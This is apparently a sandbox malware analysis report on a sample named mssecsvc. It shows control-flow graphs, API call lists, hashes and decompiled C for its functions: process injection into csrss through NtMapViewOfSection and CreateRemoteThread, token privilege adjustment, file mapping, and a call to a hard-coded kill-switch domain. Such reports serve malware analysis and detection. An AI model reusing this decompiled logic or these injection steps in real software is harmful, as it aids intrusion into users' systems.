                                                                                control_flow_graph 88 b905f2-b90615 GetModuleHandleA call b910ce 91 b905a9-b905b3 FindCloseChangeNotification 88->91 92 b90617-b90630 88->92 96 b905ca-b905d1 91->96 93 b90639-b90648 92->93 94 b90632 92->94 95 b9064c-b90652 93->95 94->93 95->91 97 b90658-b90671 95->97 96->91 98 b905d3-b905fc SetProcessAffinityMask call b905f2 96->98 97->91 99 b90677-b90690 97->99 103 b905fe-b9061c 98->103 104 b90621-b90623 98->104 99->91 101 b90696-b9069c 99->101 105 b906d8-b906de 101->105 106 b9069e-b906b1 101->106 103->104 104->95 107 b90625-b90630 104->107 109 b906fc-b90715 lstrcpyW call b924ae 105->109 110 b906e0-b906f3 105->110 106->91 108 b906b7-b906bd 106->108 107->93 107->94 108->105 112 b906bf-b906d2 108->112 115 b9074c-b90775 NtMapViewOfSection 109->115 116 b90717-b90746 GetPEB lstrcpyW lstrcatW call b924ae 109->116 110->109 113 b906f5 110->113 112->91 112->105 113->109 115->91 118 b9077b-b9078f call b90305 NtOpenProcessToken 115->118 116->91 116->115 122 b90791-b907a3 call b9115d call b907ac 118->122 123 b907c5-b907e4 CreateToolhelp32Snapshot Process32First 118->123 134 b9080e-b9080f 122->134 135 b907a5 122->135 125 b907eb-b907f5 Process32Next 123->125 126 b90865-b90872 FindCloseChangeNotification 125->126 127 b907f7-b907fb 125->127 126->91 127->125 129 b907fd-b9080d OpenProcess 127->129 129->125 131 b9080f 129->131 133 b90810-b90818 call b92574 131->133 140 b9081a-b90820 133->140 141 b9085c-b90863 FindCloseChangeNotification 133->141 134->133 135->133 137 b907a7-b907e4 CreateToolhelp32Snapshot Process32First 135->137 137->125 140->141 142 b90822-b90832 140->142 141->125 142->141 143 b90834-b9084b CreateRemoteThread 142->143 143->141 144 b9084d-b90857 call b905ba 143->144 144->141
                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00B905AD
                                                                                • GetModuleHandleA.KERNEL32(00B905EC), ref: 00B905F2
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\reytVt,\BaseNamedObjects\reytVt), ref: 00B9070A
                                                                                • lstrcpyW.KERNEL32(\BaseNamedObjects\reytVt,?), ref: 00B9072D
                                                                                • lstrcatW.KERNEL32(\BaseNamedObjects\reytVt,\reytVt), ref: 00B9073B
                                                                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,000077C4,00000000,?,00000002,00000000,00000040), ref: 00B9076B
                                                                                • NtOpenProcessToken.NTDLL(000000FF,00000020), ref: 00B90786
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B907C9
                                                                                • Process32First.KERNEL32 ref: 00B907DC
                                                                                • Process32Next.KERNEL32 ref: 00B907ED
                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B90805
                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00B90842
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B9085D
                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00B9086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification$CreateOpenProcessProcess32lstrcpy$FirstHandleModuleNextRemoteSectionSnapshotThreadTokenToolhelp32Viewlstrcat
                                                                                • String ID: \BaseNamedObjects\reytVt$\BaseNamedObjects\reytVt$csrs
                                                                                • API String ID: 3804105423-2732440246
                                                                                • Opcode ID: 6f9a7df2d700082444de55d317e6829b265054e97730b2f7bba8831fc2cb823c
                                                                                • Instruction ID: a8d459b0d7f9b52ea409742e978a99c70a21afc03d545fe69f7898c9c237a6b8
                                                                                • Opcode Fuzzy Hash: 6f9a7df2d700082444de55d317e6829b265054e97730b2f7bba8831fc2cb823c
                                                                                • Instruction Fuzzy Hash: 7A71AC31624109FFEF21AF50CC8AAAE3BEDEF59310F1140B9E9099E091C7B59F059B59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B9252F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 250 b9252f-b92573 NtOpenSection
                                                                                APIs
                                                                                • NtOpenSection.NTDLL(?,0000000E), ref: 00B9255E
                                                                                Strings
                                                                                • \BaseNamedObjects\reytVt, xrefs: 00B9254B
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: OpenSection
                                                                                • String ID: \BaseNamedObjects\reytVt
                                                                                • API String ID: 1950954290-2991043827
                                                                                • Opcode ID: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction ID: cc492c20b74137972e1aeb42a549193fdcd5baff80c1f90c3202c4eb3a6ea2fd
                                                                                • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                                                                                • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B92574 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 251 b92574-b9257c call b9252f 254 b92661-b92664 251->254 255 b92582-b925b4 NtMapViewOfSection FindCloseChangeNotification 251->255 255->254 256 b925ba-b925c0 255->256 257 b925ce-b925d8 256->257 258 b925c2-b925cb 256->258 259 b925da-b925e2 257->259 260 b925ef-b9262a call b92477 * 3 257->260 258->257 259->260 261 b925e4-b925ea call b92477 259->261 269 b9262c-b92632 call b92477 260->269 270 b92637-b9263f 260->270 261->260 269->270 272 b9264c-b92654 270->272 273 b92641-b92647 call b92477 270->273 272->254 275 b92656-b9265c call b92477 272->275 273->272 275->254
                                                                                APIs
                                                                                  • Part of subcall function 00B9252F: NtOpenSection.NTDLL(?,0000000E), ref: 00B9255E
                                                                                • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00B925A4
                                                                                • FindCloseChangeNotification.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00B90815), ref: 00B925AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Section$ChangeCloseFindNotificationOpenView
                                                                                • String ID:
                                                                                • API String ID: 1694706092-0
                                                                                • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction ID: 145636fd03ff67e7fbb2180c05d61f0a0de84b1f73a5b83d74b92730fac800b9
                                                                                • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                                                                                • Instruction Fuzzy Hash: 87212C70B00546BBDF24DF25CC56FA973A9EF90744F400168F9198E2E4DBB1AE24C718
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B91422 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 277 b91422-b91474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B9145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B9146A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                                                                                • Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
                                                                                • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B92477 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 278 b92477-b924ad NtProtectVirtualMemory NtWriteVirtualMemory
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00B9249B
                                                                                • NtWriteVirtualMemory.NTDLL ref: 00B924A4
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MemoryVirtual$ProtectWrite
                                                                                • String ID:
                                                                                • API String ID: 151266762-0
                                                                                • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                                                                                • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                                                                                • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B9144A Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 279 b9144a-b91474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                                                                                APIs
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B9145A
                                                                                • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B9146A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                                                • String ID:
                                                                                • API String ID: 3615134276-0
                                                                                • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                                                                                • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                                                                                • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 146 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 149 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 146->149 150 409a8d-409a98 __setusermatherr 146->150 153 409af2-409afa 149->153 154 409b2c-409b2f 149->154 150->149 157 409b00-409b03 153->157 158 409afc-409afe 153->158 155 409b31-409b35 154->155 156 409b09-409b0d 154->156 155->154 160 409b13-409b24 GetStartupInfoA 156->160 161 409b0f-409b11 156->161 157->156 159 409b05-409b06 157->159 158->153 158->157 159->156 162 409b26-409b2a 160->162 163 409b37-409b39 160->163 161->159 161->160 164 409b3a-409b45 GetModuleHandleA call 408140 162->164 163->164 166 409b4a-409b67 exit _XcptFilter 164->166
                                                                                C-Code - Quality: 71%
                                                                                			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























                                                                                0x00409a19
                                                                                0x00409a1b
                                                                                0x00409a20
                                                                                0x00409a2b
                                                                                0x00409a2c
                                                                                0x00409a39
                                                                                0x00409a3e
                                                                                0x00409a43
                                                                                0x00409a4a
                                                                                0x00409a51
                                                                                0x00409a64
                                                                                0x00409a72
                                                                                0x00409a7b
                                                                                0x00409a80
                                                                                0x00409a85
                                                                                0x00409a8b
                                                                                0x00409a92
                                                                                0x00409a98
                                                                                0x00409a99
                                                                                0x00409a9e
                                                                                0x00409aa3
                                                                                0x00409aa8
                                                                                0x00409ab2
                                                                                0x00409acb
                                                                                0x00409ad1
                                                                                0x00409ad6
                                                                                0x00409adb
                                                                                0x00409ae8
                                                                                0x00409aea
                                                                                0x00409af0
                                                                                0x00409b2c
                                                                                0x00409b31
                                                                                0x00409b32
                                                                                0x00409b32
                                                                                0x00409af2
                                                                                0x00409af2
                                                                                0x00409af2
                                                                                0x00409af3
                                                                                0x00409af6
                                                                                0x00409af8
                                                                                0x00409b03
                                                                                0x00409b05
                                                                                0x00409b05
                                                                                0x00409b06
                                                                                0x00409b06
                                                                                0x00409b03
                                                                                0x00409b09
                                                                                0x00409b0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00409b13
                                                                                0x00409b1a
                                                                                0x00409b24
                                                                                0x00409b39
                                                                                0x00409b26
                                                                                0x00409b26
                                                                                0x00409b26
                                                                                0x00409b3a
                                                                                0x00409b3b
                                                                                0x00409b3c
                                                                                0x00409b44
                                                                                0x00409b45
                                                                                0x00409b4a
                                                                                0x00409b4e
                                                                                0x00409b54
                                                                                0x00409b59
                                                                                0x00409b5b
                                                                                0x00409b5e
                                                                                0x00409b5f
                                                                                0x00409b60
                                                                                0x00409b67

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                • String ID:
                                                                                • API String ID: 801014965-0
                                                                                • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                                                • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00B907AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 167 b907ac-b907bf call b9144a FreeLibrary FindCloseChangeNotification 170 b907c5-b907e4 CreateToolhelp32Snapshot Process32First 167->170 171 b907eb-b907f5 Process32Next 170->171 172 b90865-b90872 FindCloseChangeNotification 171->172 173 b907f7-b907fb 171->173 175 b905a9-b905d1 FindCloseChangeNotification 172->175 173->171 174 b907fd-b9080d OpenProcess 173->174 174->171 176 b9080f 174->176 180 b905d3-b905fc SetProcessAffinityMask call b905f2 175->180 177 b90810-b90818 call b92574 176->177 183 b9081a-b90820 177->183 184 b9085c-b90863 FindCloseChangeNotification 177->184 186 b905fe-b9061c 180->186 187 b90621-b90623 180->187 183->184 188 b90822-b90832 183->188 184->171 186->187 189 b9064c-b90652 187->189 190 b90625-b90630 187->190 188->184 191 b90834-b9084b CreateRemoteThread 188->191 189->175 194 b90658-b90671 189->194 192 b90639-b90648 190->192 193 b90632 190->193 191->184 195 b9084d-b90857 call b905ba 191->195 192->189 193->192 194->175 196 b90677-b90690 194->196 195->184 196->175 198 b90696-b9069c 196->198 199 b906d8-b906de 198->199 200 b9069e-b906b1 198->200 202 b906fc-b90715 lstrcpyW call b924ae 199->202 203 b906e0-b906f3 199->203 200->175 201 b906b7-b906bd 200->201 201->199 205 b906bf-b906d2 201->205 208 b9074c-b90775 NtMapViewOfSection 202->208 209 b90717-b90746 GetPEB lstrcpyW lstrcatW call b924ae 202->209 203->202 206 b906f5 203->206 205->175 205->199 206->202 208->175 211 b9077b-b9078f call b90305 NtOpenProcessToken 208->211 209->175 209->208 211->170 215 b90791-b907a3 call b9115d call b907ac 211->215 220 b9080e-b9080f 215->220 221 b907a5 215->221 220->177 221->177 222 b907a7-b907e4 CreateToolhelp32Snapshot Process32First 221->222 222->171
                                                                                APIs
                                                                                  • Part of subcall function 00B9144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B9145A
                                                                                  • Part of subcall function 00B9144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B9146A
                                                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00B905AD
                                                                                • FreeLibrary.KERNEL32(73E60000,?,00B9079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B907B8
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00B9079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B907BF
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B907C9
                                                                                • Process32First.KERNEL32 ref: 00B907DC
                                                                                • Process32Next.KERNEL32 ref: 00B907ED
                                                                                • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B90805
                                                                                • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00B90842
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B9085D
                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00B9086C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B90000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_b90000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                                                                                • String ID: csrs
                                                                                • API String ID: 238827593-2321902090
                                                                                • Opcode ID: cb63e8b7f3a99e4be573476feab88a83968f02cd0365d5f729e494595204ac2c
                                                                                • Instruction ID: 443d1d48afbaf0e1edeccc3bb929a005ee6fe5b36196ef6723c459044b540bbc
                                                                                • Opcode Fuzzy Hash: cb63e8b7f3a99e4be573476feab88a83968f02cd0365d5f729e494595204ac2c
                                                                                • Instruction Fuzzy Hash: 76113030611205BFEF256F21CC8EBBF3AADEF54711F0000BCF94A99091D6B49F019A6A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 92%
                                                                                			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				InternetCloseHandle(_t27); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}















                                                                                0x00408155
                                                                                0x00408157
                                                                                0x00408158
                                                                                0x0040815c
                                                                                0x00408160
                                                                                0x00408164
                                                                                0x00408168
                                                                                0x0040816c
                                                                                0x00408177
                                                                                0x0040817b
                                                                                0x0040818e
                                                                                0x00408194
                                                                                0x004081a7
                                                                                0x004081ab
                                                                                0x004081ad
                                                                                0x004081b9

                                                                                APIs
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                                                  • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                  • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                                                Strings
                                                                                • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                                                                                Memory Dump Source
                                                                                • Source File: 00000004.00000002.663214895.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000004.00000002.663184131.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663260796.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663302461.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663328344.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663454036.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.663555779.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                                                • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                                                                                • API String ID: 774561529-2942426231
                                                                                • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                                                                                • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                                                                                • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 7FEA4499 Relevance: 7.6, APIs: 5, Instructions: 83fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 227 7fea4499-7fea44a1 228 7fea44c8-7fea4504 CreateFileA 227->228 229 7fea44a3-7fea44ad GetFileAttributesA 227->229 236 7fea4506-7fea451f 228->236 237 7fea4527-7fea454d 228->237 229->228 230 7fea44af-7fea44c0 SetFileAttributesA 229->230 230->228 232 7fea44c2 230->232 232->228 236->237 241 7fea4521 236->241 242 7fea4558-7fea4582 CreateFileMappingA 237->242 243 7fea454f-7fea4556 237->243 241->237 246 7fea458d-7fea45a2 MapViewOfFile 242->246 247 7fea4584-7fea458b 242->247 243->242 249 7fea45a8-7fea45ae 246->249 247->246
                                                                                APIs
                                                                                • GetFileAttributesA.KERNELBASE(?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44A4
                                                                                • SetFileAttributesA.KERNELBASE(?,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44B8
                                                                                • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44ED
                                                                                • CreateFileMappingA.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA4565
                                                                                • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA459A
                                                                                Memory Dump Source
